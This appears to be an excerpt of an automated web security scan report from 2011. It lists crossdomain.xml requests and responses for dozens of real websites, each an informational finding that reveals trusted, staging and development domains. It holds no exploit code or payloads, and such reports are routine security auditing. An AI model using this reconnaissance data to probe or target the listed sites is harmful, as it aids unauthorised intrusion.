HTTP/1.0 200 OK Cache-Control: max-age=1800 Content-Length: 1091 Content-Type: text/xml Last-Modified: Wed, 07 Apr 2010 20:06:07 GMT Accept-Ranges: bytes ETag: "51dd6fc28dd6ca1:35ee" X-Powered-By: ASP.NET Server: Continental Airlines, Inc. Date: Sat, 02 Apr 2011 14:15:45 GMT Connection: close Set-Cookie: v1st=FAA76B6551E778BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.continental.com <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="motifcdn2.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="motifcdn.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m2.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m3.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m1.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m2.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.uk.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.fr.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.se.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="m.de.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="nhqsinsmktg02" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.deadline.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.deadline.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 01 Mar 2011 01:37:40 GMT ETag: "8ca98e-db-49d61d7844100" X-Server-Name: 01-www-alice Content-Type: application/xml Date: Sat, 02 Apr 2011 13:52:44 GMT Content-Length: 219 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.paramount.com" /> </c ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.deviantart.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.deviantart.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:25:14 GMT Server: Apache Last-Modified: Tue, 15 Mar 2011 05:07:29 GMT ETag: "1c0003a3-2ba-49e7e6 Accept-Ranges: bytes Content-Length: 698 _eep-Alive: timeout=45 _onnection: Keep-Alive Content-Type: application/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="s.deviantart.com" /> < ...[SNIP]... <allow-access-from domain="st.deviantart.com" /> <allow-access-from domain="staging.deviantart.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dreamstime.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dreamstime.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:12:27 GMT Server: Apache Last-Modified: Thu, 09 Apr 2009 12:12:12 GMT ETag: "3f0421-1db-4671e2870bf00 Accept-Ranges: bytes Content-Length: 475 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="picfindr.com" /> <allow-access-from domain="www.picfindr.com" /> <allow-access-from domain="spimeo.com" /> <allow-access-from domain="www.spimeo.com" /> ...[SNIP]... <allow-access-from domain="thumbs.dreamstime.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.elyrics.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.elyrics.net |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:35:45 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14 Last-Modified: Tue, 21 Sep 2010 16:59:44 GMT ETag: "1848a61-1c0-490c7f4 Accept-Ranges: bytes Content-Length: 448 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM \"http://www.adobe.com <cross-domain-policy> <allow-access-from domain="www.layoutstar.com" /> <allow-access-from domain="layoutstar.com" /> <allow-access-from domain="srv100.com" /> <allow-access-from domain="www.srv100.com" /> <allow-access-from domain="74.55.225.74" /> <allow-access-from domain="images.elyrics.net" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.elyricsworld |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.elyricsworld.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 20:22:02 GMT Server: Apache/2.2.17 (Unix) PHP/5.2.14 Last-Modified: Thu, 10 Dec 2009 15:47:52 GMT ETag: "100f8b-8d-47a61bad85a00" Accept-Ranges: bytes Content-Length: 141 Connection: close Content-Type: text/xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <allow-access-from domain="widget.elyricsworld.com"/> </cross-domain-policy> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.epicurious.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.epicurious.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 29 Sep 2010 21:34:57 GMT ETag: "c65b3-161-4916cbb9d8240" Content-Type: text/xml Date: Sat, 02 Apr 2011 14:00:01 GMT Content-Length: 353 Connection: close Cache-Control: max-age=600 Expires: Thu, 31 Mar 2011 19:17:43 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="rsu.feedroom.com" /> <allow-access-from domain="feedroom.com" /> <allow-access-from domain="survey.eqr1.com" /> <allow-access-from domain="ads.pointroll.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.greatschools |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.greatschools.org |
HTTP/1.1 200 OK Server: Apache/1.3.41 (Unix) mod_perl/1.31 mod_ssl/2.8.31 OpenSSL/0.9.8e mod_jk/1.2.28 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:18:15 GMT Keep-Alive: timeout=15, max=991 Accept-Ranges: bytes Last-Modified: Wed, 20 Jan 2010 23:35:44 GMT Content-Length: 584 Connection: close <cross-domain-policy xmlns:xsi="http://www.w3 xsi:noNamespaceSchem <allow-access-from d ...[SNIP]... <allow-access-from domain="greatschools.org" /> ...[SNIP]... <allow-access-from domain="staging.greatschools.org" /> <allow-access-from domain="dev.greatschools.org" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.icontact.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.icontact.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:00:52 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.12-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Last-Modified: Wed, 17 Nov 2010 21:30:01 GMT ETag: "234-4954660324840" Accept-Ranges: bytes Content-Length: 564 Connection: close Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="icontact.com" /> <allow-access-from domain="icontactplus.com" /> <allow-access-from domain="plus.icontact.com" /> <allow-access-from domain="videos.icontact.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.inbox.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.inbox.com |
HTTP/1.1 200 OK Content-Length: 106 Content-Type: text/xml Last-Modified: Fri, 25 Mar 2011 12:43:54 GMT Accept-Ranges: bytes ETag: "9ea62a4deaeacb1:33ef" Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:33:24 GMT Connection: close <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="" /> </cross-domain-policy> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.iwon.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.iwon.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:31:47 GMT Server: Apache Last-Modified: Fri, 01 Apr 2011 21:52:39 GMT ETag: "588da-3e8-49fe26db757c0" Accept-Ranges: bytes Content-Length: 1000 P3P: policyref="http://c4.iwon Connection: close Content-Type: application/xml Set-Cookie: ltm=2130926090.20480.0000 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <allow-access-from domain="i1img.com" /> <allow-access-from domain="ak.imgfarm.com" /> <allow-access-from domain="kc1907.jeeves.ask.info" /> <allow-access-from domain="http://fhhgydaa.joyent.us"/> <allow-access-from domain="http://fhhgydaa.joyent.us"/> <allow-access-from domain="http://fhhgydab.joyent.us"/> <allow-access-from domain="http://fhhgydac.joyent.us"/> <allow-access-from domain="http://fhhgydad.joyent.us"/> <allow-access-from domain="http://fhhgydae.joyent.us"/> <allow-access-from domain="http://fhhgydaf.joyent.us"/> <allow-access-from domain="http://fhhgydag.joyent.us"/> <allow-access-from domain="http://fhhgydak.joyent.us"/> <allow-access-from domain="http://fhhgydal.joyent.us"/> <allow-access-from domain="http://www.facebook.com"/> <allow-access-from domain="http://api.facebook.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.justluxe.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.justluxe.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:45:48 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Thu, 07 May 2009 06:14:13 GMT ETag: "13f8306-147-4694c6b Accept-Ranges: bytes Content-Length: 327 Connection: close Content-Type: text/xml <cross-domain-policy> <allow-access-from domain="www.luxevegas.com" /> <allow-access-from domain="luxevegas.com" /> <allow-access-from domain="dev.luxevegas.com" /> <allow-access-from domain="www.just ...[SNIP]... <allow-access-from domain="justluxe.com" /> <allow-access-from domain="dev.justluxe.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kazaa.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kazaa.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:43:52 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 17 Mar 2011 05:43:23 GMT ETag: "1579160-162-49ea723 Accept-Ranges: bytes Content-Length: 354 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="kazaa.com"/> <allow-access-from domain="stage.kazaa.com"/> ...[SNIP]... <allow-access-from domain="www.stage.kazaa.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kodak.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kodak.com |
HTTP/1.0 200 OK Server: Apache Accept-Ranges: bytes Content-Length: 317 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:42:08 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="download.kodak.com" /> <allow-access-from domain="pgatour.com" /> <allow-access-from domain="i.cdn.turner.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.livejournal |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.livejournal.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) X-AWS-Id: ws08 Last-Modified: Thu, 17 Mar 2011 16:39:44 GMT ETag: "458fbb-26b-49eb04f04f400 Keep-Alive: timeout=30, max=100 Content-Type: text/xml X-Debug: USen (null) (null) X-VWS-Id: bil1-varn08 Content-Length: 619 Date: Sat, 02 Apr 2011 13:26:47 GMT X-Varnish: 888943455 884829416 Age: 36787 Via: 1.1 varnish Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-coss-domain ...[SNIP]... <allow-access-from domain="wh.lj.ru"/> <allow-access-from domain="ljaqua.wh.lj.ru"/> <allow-access-from domain="swfplayer.services <allow-access-from domain="player.livejournal.ru"/> <allow-access-from domain="player.championat.net"/> <allow-access-from domain="player.gazeta.ru"/> <allow-access-from domain="player.quto.ru"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.loc.gov |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.loc.gov |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:52:49 GMT Server: Apache Last-Modified: Sat, 08 Jan 2011 01:08:58 GMT ETag: "591a-df-61211e80" Accept-Ranges: bytes Content-Length: 223 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="cdn.loc.gov" to-ports="80"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.lowfares.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.lowfares.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:05:41 GMT Server: Apache/2.0.52 (CentOS) Set-Cookie: browser_info=non_mobile Set-Cookie: sid=1; path=/; expires=Tue, 01-Apr-2014 14:05:41 GMT Set-Cookie: pageview=0; path=/; expires=Sat, 02-Apr-2011 15:05:41 GMT Set-Cookie: lowfares=zA2gPjUtl01 Content-Length: 140 P3P: policyref="/static/policy Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Connection: close <cross-domain-policy> <allow-access-from domain="www.imageality.com"></allow-access-from> </cross-domain-policy> <!-- page_complete --> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.lyricsmode.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.lyricsmode.com |
HTTP/1.1 200 OK Server: nginx Date: Sat, 02 Apr 2011 13:26:28 GMT Content-Type: text/xml Content-Length: 119 Last-Modified: Mon, 22 Oct 2007 13:08:20 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="widget.lyricsmode.com"/></cross-domain-policy> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.marriott.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.marriott.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server/6.1.0.33 Apache/2.0.47 (Unix) DAV/2 Last-Modified: Wed, 03 Mar 2010 20:37:16 GMT ETag: "15-354-72a61700" Accept-Ranges: bytes Content-Length: 852 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE" Content-Type: text/xml Cache-Control: max-age=4204 Expires: Sat, 02 Apr 2011 14:43:37 GMT Date: Sat, 02 Apr 2011 13:33:33 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="cache.mi-perftest1.com"/> <allow-access-from domain="www.mi-perftest1.com"/> <allow-access-from domain="cache.marriott.com"/> ...[SNIP]... <allow-access-from domain="www.marriott.de"/> <allow-access-from domain="www.marriott.fr"/> ...[SNIP]... <allow-access-from domain="www.marriotthotels.co.kr"/> <allow-access-from domain="www.latinoamerica ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.michaels.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.michaels.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:19 GMT Server: Demandware eCommerce Server Content-Length: 288 Cache-Control: public;max-age=55864 Expires: Sun, 03 Apr 2011 05:11:23 GMT Last-Modified: Thu, 31 Mar 2011 21:49:51 GMT Vary: Accept-Encoding Accept-Ranges: bytes Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="demandware.edgesuite.net" /> <allow-access-from domain="michaels.liquifire.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mlive.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mlive.com |
HTTP/1.0 200 OK Server: Apache Content-Length: 166 Content-Type: text/xml ETag: "3bb77-a6-4867f740fbe40" P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Cache-Control: max-age=1 Expires: Sat, 02 Apr 2011 14:00:26 GMT Date: Sat, 02 Apr 2011 14:00:25 GMT Connection: close <cross-domain-policy> <allow-access-from domain="businessfinder.mlive.com"/> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.motime.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.motime.com |
HTTP/1.1 200 OK Server: nginx/0.7.63 Date: Sat, 02 Apr 2011 13:57:01 GMT Content-Type: text/xml Content-Length: 415 Last-Modified: Mon, 08 Mar 2010 16:30:37 GMT Connection: close Set-Cookie: trkdada=x3UsLk2XKy1R P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Accept-Ranges: bytes <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="img.dada.net" to-ports="*"/> <allow-access-from domain="s.motime.com" to-ports="*"/> <allow-access-from domain="s.play.me" to-ports="*"/> <allow-access-from domain="new.playme.com" to-ports="*"/> <allow-access-from domain="img.playme.com" to-ports="*"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.movietickets |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.movietickets.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 11 Dec 2007 22:58:11 GMT Accept-Ranges: bytes ETag: "8d40b84d493cc81:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:36:32 GMT Connection: close Content-Length: 220 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="movietickets.com" /> </ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.orbitz.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.orbitz.com |
HTTP/1.1 200 OK Last-Modified: Mon, 28 Mar 2011 17:17:11 GMT ETag: "2b8-49f8e1d3493c0" Content-Type: text/xml Content-Length: 696 Server: Apache Date: Sat, 02 Apr 2011 13:33:54 GMT Age: 7467 Connection: keep-alive Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe <cross-domain-policy> <allow-access-from domain="media.pointroll.com"/> <allow-access-from domain="www.pointroll.com"/> <allow-access-from domain="submit.pointroll.com"/> <allow-access-from domain="data.pointroll.com"/> <allow-access-from domain="speed.pointroll.com"/> <allow-access-from domain="mirror.pointroll.com"/> <allow-access-from domain="mx.pointroll.com"/> <allow-access-from domain="geo.pointroll.com"/> <allow-access-from domain="ll.pointroll.com"/> <allow-access-from domain="clk.pointroll.com"/> <allow-access-from domain="clients.pointroll.com"/> <allow-access-from domain="fdaf.pointroll.com"/> <allow-access-from domain="demo.pointroll.net"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.panoramio.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.panoramio.com |
HTTP/1.0 200 OK Expires: Sat, 02 Apr 2011 17:55:24 GMT Content-Type: text/x-cross-domain Date: Fri, 01 Apr 2011 17:55:24 GMT Server: Google Frontend Cache-Control: public, max-age=86400 Age: 70936 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="www.porsche.com" /> <allow-access-from domain="flash.porsche.com" /> <allow-access-from domain="gmaps-samples-flash ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.phoenix.edu |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.phoenix.edu |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:43:56 GMT Server: Apache/2.2.3 (CentOS) Content-Length: 639 Last-Modified: Fri, 29 Jan 2010 00:33:04 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="phoenix.edu" /> ...[SNIP]... <allow-access-from domain="beta.phoenix.edu" /> <allow-access-from domain="iamaphoenix.phoenix.edu" /> <allow-access-from domain="cdn-static.phoenix.edu" /> <allow-access-from domain="rfi.phoenix.edu" /> <allow-access-from domain="ws.aptimus.com" /> <allow-access-from domain="network.aptimus.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.playdom.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.playdom.com |
HTTP/1.1 200 OK Server: nginx Date: Sat, 02 Apr 2011 13:41:53 GMT Content-Type: application/xml Connection: close ETag: W/"219-1296759480000" Last-Modified: Thu, 03 Feb 2011 18:58:00 GMT Content-Length: 219 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="cdn0.mobwarsapp.com" /> </cr ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.regions.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.regions.com |
HTTP/1.1 200 OK Set-Cookie: www.regions.com-http Content-Length: 1000 Content-Type: text/xml Last-Modified: Tue, 23 Feb 2010 15:52:47 GMT Accept-Ranges: bytes ETag: "3b38bf3ea0b4ca1:83cf" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:34:33 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.luckie.net" /> <allow-access-from domain="luckie.net" /> <allow-access-from domain="media.pointroll.com"/> <allow-access-from domain="www.pointroll.com"/> <allow-access-from domain="submit.pointroll.com"/> <allow-access-from domain="data.pointroll.com"/> <allow-access-from domain="speed.pointroll.com"/> <allow-access-from domain="mirror.pointroll.com"/> <allow-access-from domain="mx.pointroll.com"/> <allow-access-from domain="geo.pointroll.com"/> <allow-access-from domain="ll.pointroll.com"/> <allow-access-from domain="clk.pointroll.com"/> <allow-access-from domain="clients.pointroll.com"/> <allow-access-from domain="fdaf.pointroll.com"/> <allow-access-from domain="demo.pointroll.net"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.rr.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.rr.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:25:54 GMT Server: Apache Last-Modified: Mon, 04 Jan 2010 21:29:25 GMT ETag: "1b67-760-6a5b1740" Accept-Ranges: bytes Content-Length: 1888 Keep-Alive: timeout=3, max=384 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.rr.com" secure="false ...[SNIP]... <allow-access-from domain="quantum.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="hercules.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="broker.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="content.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="cmarsh.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.life.com" secure="false"/> ...[SNIP]... <allow-access-from domain="img.timeinc.net" secure="false"/> ...[SNIP]... <allow-access-from domain="img3.timeinc.net" secure="false"/> ...[SNIP]... <allow-access-from domain="dev.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="npaci.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="mmink.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="smadden.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="emitchell.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="qa06.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="consult06.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="consult07.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="consult08.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="consult09.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="kpisz.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="lmansfield.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="tconley.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="tnguyen.webapps.rr.com" secure="false"/> ...[SNIP]... <allow-access-from domain="img3.allyou.com" secure="false"/> ...[SNIP]... <allow-access-from domain="video.rr.com" secure="false"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sacbee.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sacbee.com |
HTTP/1.0 200 OK Server: Apache/1.3.41 Last-Modified: Thu, 20 Sep 2007 14:43:32 GMT ETag: "15a42fa-1b6-46f28714" Content-Type: application/xml Date: Sat, 02 Apr 2011 13:40:45 GMT Content-Length: 438 Connection: close <cross-domain-policy> <allow-access-from domain="www.sacbee.com"/> <allow-access-from domain="media.sacbee.com"/> <allow-access-from domain="data.sacbee.com"/> <allow-access-from domain="dwb.sacbee.com"/> <allow-access-from domain="sports.sacbee.com"/> <allow-access-from domain="preview.sacbee.com"/> <allow-access-from domain="sacbee.com"/> <allow-access-from domain="newsroom-static ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sharebuilder |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sharebuilder.com |
HTTP/1.1 200 OK Content-Length: 228 Content-Type: text/xml Content-Location: http://www.sharebuilder Last-Modified: Tue, 08 Mar 2011 23:22:08 GMT Accept-Ranges: bytes ETag: "050aaa4e7ddcb1:6af" Server: Microsoft-IIS/6.0 Set-Cookie: TLTHID=9DCFD617433D5 Set-Cookie: TLTSID=9DCFD617433D5 HostName: A103 Date: Sat, 02 Apr 2011 13:43:02 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="content.sharebuilder.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.stltoday.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.stltoday.com |
HTTP/1.1 200 OK Server: WWW Cache-Control: public, max-age=300 X-TNCMS-Memory-Usage: 2012780 Content-Type: text/x-cross-domain X-TNCMS-Venue: app Date: Sat, 02 Apr 2011 13:40:27 GMT X-TN-ServedBy: cms.app.80 X-Loop: 1 X-TNCMS-Version: 1.7.7 X-TNCMS-Render-Time: 0.0227 Accept-Ranges: bytes X-PHP-Engine: enabled Connection: close X-Cache-Info: caching Real-Hostname: stltoday.com X-TNCMS-Served-By: cmsapp2 Content-Length: 315 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="bloximages.newyork1.vip ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.stlyrics.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.stlyrics.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:06:34 GMT Server: Apache/2.0.55 Last-Modified: Wed, 28 May 2008 05:00:00 GMT ETag: "e0037-61-48eb5400" Accept-Ranges: bytes Content-Length: 97 Connection: close Content-Type: application/xml <cross-domain-policy> <allow-access-from domain="lyrics.stlyrics.com" /> </cross-domain-policy> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.talkingpo |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.talkingpointsmemo.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) Content-Type: text/xml Date: Sat, 02 Apr 2011 13:51:51 GMT Keep-Alive: timeout=10, max=981 Accept-Ranges: bytes ETag: "f2c002-174-4764d0fc57200 Connection: close Last-Modified: Mon, 19 Oct 2009 17:27:36 GMT Content-Length: 372 <cross-domain-policy> <allow-access-from domain="www.rockthatproject.com"/> <allow-access-from domain="rockthatproject.com"/> <allow-access-from domain="ec2-67-202-52-64.compute <al ...[SNIP]... <allow-access-from domain="talkingpointsmemo.com"/> <allow-access-from domain="michiko23.com"/> ...[SNIP]... |
Severity: | Information |
